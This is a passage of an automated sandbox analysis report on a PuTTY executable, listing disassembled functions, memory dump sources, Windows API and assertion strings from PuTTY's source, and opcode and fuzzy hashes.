                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: GetVersionExA$kernel32.dll
                      • API String ID: 190572456-3521452493
                      • Opcode ID: 0c14bb31d7d74514721674b52997aae77921c1310d88e033a61af6d90ed3c4d9
                      • Instruction ID: e434a530624342c4a307e0c5824aefe41091f9dcba7b827c935a72426634c1a2
                      • Opcode Fuzzy Hash: 0c14bb31d7d74514721674b52997aae77921c1310d88e033a61af6d90ed3c4d9
                      • Instruction Fuzzy Hash: 7F316F23D2D78295F620CB25B8503776FA1ABA9304F209235E59C862A5DF7CE9909F18
                      Function 00007FF678652B10 Relevance: 5.0, Strings: 3, Instructions: 1243COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: !mp_cmp_hs(remainder, d)$!mp_eq_integer(d, 0)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c
                      • API String ID: 1949149715-1331618967
                      • Opcode ID: c92e9b05d724342b17149865c022194c84f2cdf934dcf91f9481abecd86be9e1
                      • Instruction ID: eb2b82fb7e31a3adf5fa6fa3b2fb5da226c417e2eb4f211bbea02046939b9750
                      • Opcode Fuzzy Hash: c92e9b05d724342b17149865c022194c84f2cdf934dcf91f9481abecd86be9e1
                      • Instruction Fuzzy Hash: 92A22463B28B8596EA10DF61D6143BF6752EB45FC0F198531DE1D8B786DE3CE8819308
                      Function 00007FF678651CB0 Relevance: 4.7, Strings: 3, Instructions: 957COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$word < x->nw$x0->nw == x1->nw
                      • API String ID: 1949149715-4037912331
                      • Opcode ID: 43eaca89571b15201c73cdb88dec1c6938a79bfea65ec062044a08198682b48d
                      • Instruction ID: 77bd1f969e3d5b46d43aa5b5ab122497e1b1a0f81a2e11b50e021e1509b5e33b
                      • Opcode Fuzzy Hash: 43eaca89571b15201c73cdb88dec1c6938a79bfea65ec062044a08198682b48d
                      • Instruction Fuzzy Hash: FF82CD73B29B8591EA10CB26D45427F6B62FB48FD0F298531CE5E87795EE38E881D304
                      Function 00007FF6785E4030 Relevance: 4.3, Strings: 3, Instructions: 551COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$0 <= p && p < width$opos == term->cols
                      • API String ID: 0-2817353598
                      • Opcode ID: 48c84171e4e6dbe3ca64c24b21b4607ca9543aec5e6d4045095969cd4c2680a5
                      • Instruction ID: 997823f21725c62d97ba86993b1de9fc4ecd2cda1a9a08555c693bc68ce82962
                      • Opcode Fuzzy Hash: 48c84171e4e6dbe3ca64c24b21b4607ca9543aec5e6d4045095969cd4c2680a5
                      • Instruction Fuzzy Hash: 3A52B073A14B9986EB948F25D5447EE3B68FB88B84F168122EF4E473A5DF38D940C344
                      Function 00007FF67864F230 Relevance: 4.3, Strings: 3, Instructions: 501COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$len <= pool->nw$scratch.nw >= mp_mul_scratchspace_unary(inlen)
                      • API String ID: 1949149715-1079915730
                      • Opcode ID: 175617af099b570f1206e9f1cb82f0c403bc199e54224aa9d1c812f6e4cfecdf
                      • Instruction ID: 35d2abad1a1d940bde6a0f212abd138030f9789958c52038793822aab3281eae
                      • Opcode Fuzzy Hash: 175617af099b570f1206e9f1cb82f0c403bc199e54224aa9d1c812f6e4cfecdf
                      • Instruction Fuzzy Hash: 6722B133B29A86A4EA60CF21E5543AF7761FB98B84F644032CA8D87B58EF7CD545D304
                      Function 00007FF6786A23A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID: GetLocaleInfoEx
                      • API String ID: 2299586839-2904428671
                      • Opcode ID: 877343d59bc69b94a8249b42954be88c557d486399bdd3dc21f370ad172789df
                      • Instruction ID: b0299f6e322fd39dd4b7632ec0fc94c763d5b74743adee6f31a2c09db7f0f1ff
                      • Opcode Fuzzy Hash: 877343d59bc69b94a8249b42954be88c557d486399bdd3dc21f370ad172789df
                      • Instruction Fuzzy Hash: 1E012B22B1874191EB008B66F4001ABBB61FF94FC0F644035DE0D93B65CE3CDD459748
                      Function 00007FF678633F40 Relevance: 3.0, APIs: 2, Instructions: 41fileCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirstWindow
                      • String ID:
                      • API String ID: 2475344593-0
                      • Opcode ID: f0e79997787017242be0678a1299ff4153720c64c21be0883609586eed0df27f
                      • Instruction ID: 578e13ba5002d1a38bc8ae2c17b32a513708b8953d054b7298ded6133616c19c
                      • Opcode Fuzzy Hash: f0e79997787017242be0678a1299ff4153720c64c21be0883609586eed0df27f
                      • Instruction Fuzzy Hash: 9601D422F2D281A1FD206B35A9063BB1B505F997B0FA00231DD2D877D5ED1CDCC6AB08
                      Function 00007FF6785D1B9F Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CaretInfoLocaleProcWindow
                      • String ID:
                      • API String ID: 3511955094-0
                      • Opcode ID: 0d6e8085940ef99706bb6f3e1a4ef4ac9e24338f3159f2bfa11a7cc6f6f21ebf
                      • Instruction ID: 0525e7e4616bafe2ec99604b5dfbae02f43c9a381306b0932714a989640e943f
                      • Opcode Fuzzy Hash: 0d6e8085940ef99706bb6f3e1a4ef4ac9e24338f3159f2bfa11a7cc6f6f21ebf
                      • Instruction Fuzzy Hash: A5F0E927B1818645F9019B32B8053F719406B45BE5F640076CE0DC77D6CC3CDA86BB14
                      Function 00007FF678650F20 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$len <= pool->nw
                      • API String ID: 1949149715-1244525610
                      • Opcode ID: f0f2536dc577322ef78fa98e8fdf80bd561ec85345326284fd71e3de6c089bb4
                      • Instruction ID: 7050aea035321cf48d970d2aa3b9d2547454cf182698d8102cdd279aa675372d
                      • Opcode Fuzzy Hash: f0f2536dc577322ef78fa98e8fdf80bd561ec85345326284fd71e3de6c089bb4
                      • Instruction Fuzzy Hash: A071BDB7B29BA991EA50CB21E94426F6764FB48BC4F654036DE8D83754EE3CD881D304
                      Function 00007FF67864E170 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$bits < 0x10000
                      • API String ID: 0-3675183975
                      • Opcode ID: 28a1504607651e3aa4f6fb2db7b465a402ed893108aaac175b55d2498a7ba946
                      • Instruction ID: 451796537b343553154c5b2e83e697473755cafb84efdeb34bd2992c344880f2
                      • Opcode Fuzzy Hash: 28a1504607651e3aa4f6fb2db7b465a402ed893108aaac175b55d2498a7ba946
                      • Instruction Fuzzy Hash: 01415BA6F64A1556EE51C9768E542A92643EB847F0F688331CE3E833D8DE2CDA42D304
                      Function 00007FF6786AAEC8 Relevance: 2.0, APIs: 1, Instructions: 463COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CurrentFeaturePresentProcessProcessor
                      • String ID:
                      • API String ID: 1010374628-0
                      • Opcode ID: 70f05b61e9069f215347a8f1a556d803af62b8d15b7b0aff6d396f4fe1be9d85
                      • Instruction ID: 04f4aae55ece3d439ce7638b1e92804af95a5b47e9bcd5527536ea413e942649
                      • Opcode Fuzzy Hash: 70f05b61e9069f215347a8f1a556d803af62b8d15b7b0aff6d396f4fe1be9d85
                      • Instruction Fuzzy Hash: D202B323A3D66261FE259B32984227B1F84AF01B90F744536DD6DC67D2DE3DEC01A70A
                      Function 00007FF6785DF280 Relevance: 1.9, APIs: 1, Instructions: 355timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: BlinkCaretTime
                      • String ID:
                      • API String ID: 1096504186-0
                      • Opcode ID: d3b2025046e6c3242374deb158bf3089506e19e4ab169dd7edca1107dee63013
                      • Instruction ID: fd99b46b03d4603cbb131a4c81bc38fa6bd4b1ee603bc2969d1bcb5fdd42d9d8
                      • Opcode Fuzzy Hash: d3b2025046e6c3242374deb158bf3089506e19e4ab169dd7edca1107dee63013
                      • Instruction Fuzzy Hash: CDF1C323E182C286F7659771A0813FB6E91DB85784F249036CF9E87787DE7CE8858319
                      Function 00007FF678696CA4 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3215553584-0
                      • Opcode ID: f05dfe4f8452654d334cc3241bb3ea17cad71d45a3c268dd9d68e07dcf381698
                      • Instruction ID: 41f0ebfd1af04d38cf8145e9905b2c6771dfb1d6118b630c0ba38a30ded459d2
                      • Opcode Fuzzy Hash: f05dfe4f8452654d334cc3241bb3ea17cad71d45a3c268dd9d68e07dcf381698
                      • Instruction Fuzzy Hash: 01D1C46392DB4692EF658F34D44027E3B95EB00BA4F64063ADA6D873D4CF38EC51A358
                      Function 00007FF6785DED80 Relevance: 1.7, APIs: 1, Instructions: 245COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04d804fca383ebdd87389251a5403f1d7e686250a67475f3d8e14b7a1134c6f1
                      • Instruction ID: 1a09e0f2a8aa8a43e7cddf6769adaf05a326fa093a5ca3772d743fbe412d783a
                      • Opcode Fuzzy Hash: 04d804fca383ebdd87389251a5403f1d7e686250a67475f3d8e14b7a1134c6f1
                      • Instruction Fuzzy Hash: 94C1DF33A1A2E189F741CB65C44CBEB3B94EB51344FA7A035CA68C7382FFB958858754
                      Function 00007FF6786B60D4 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 474895018-0
                      • Opcode ID: 3dc24be4488f4c8b10247529cee2e8d24edc721d6d4ed829458648f97c931c59
                      • Instruction ID: 5dbee22ec8afd81900458bf0694da84082f331413b2ff113e08811b2b21a745a
                      • Opcode Fuzzy Hash: 3dc24be4488f4c8b10247529cee2e8d24edc721d6d4ed829458648f97c931c59
                      • Instruction Fuzzy Hash: 7961C523F2C55296FB648AB8844577E6E819F40768F350235FA2EC76C6DE7CEC41A708
                      Function 00007FF6786A9A14 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF6786A3098: GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                        • Part of subcall function 00007FF6786A3098: FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                        • Part of subcall function 00007FF6786A3098: SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6786A9817,00000000,00000092,?,?,00000000,?,?,00007FF6786988F9), ref: 00007FF6786A9AB2
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystemValue
                      • String ID:
                      • API String ID: 3029459697-0
                      • Opcode ID: 88e0867d24c3eab24e0c880a4b38ef51eafc333871d5a020cd09adc8302cdfcc
                      • Instruction ID: e3b2e211bf7a9b58fc9fb8a7d2568448ada2242f7e1f1b7f9eea53f242561005
                      • Opcode Fuzzy Hash: 88e0867d24c3eab24e0c880a4b38ef51eafc333871d5a020cd09adc8302cdfcc
                      • Instruction Fuzzy Hash: DF11E763A286559AEB148F36D4402AA7FA0FB90BA0F748136C769833C0EE38DDD1D741
                      Function 00007FF6786A9D30 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00007FF6786A3098: GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                        • Part of subcall function 00007FF6786A3098: FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                        • Part of subcall function 00007FF6786A3098: SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6786A97D3,00000000,00000092,?,?,00000000,?,?,00007FF6786988F9), ref: 00007FF6786A9DAE
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
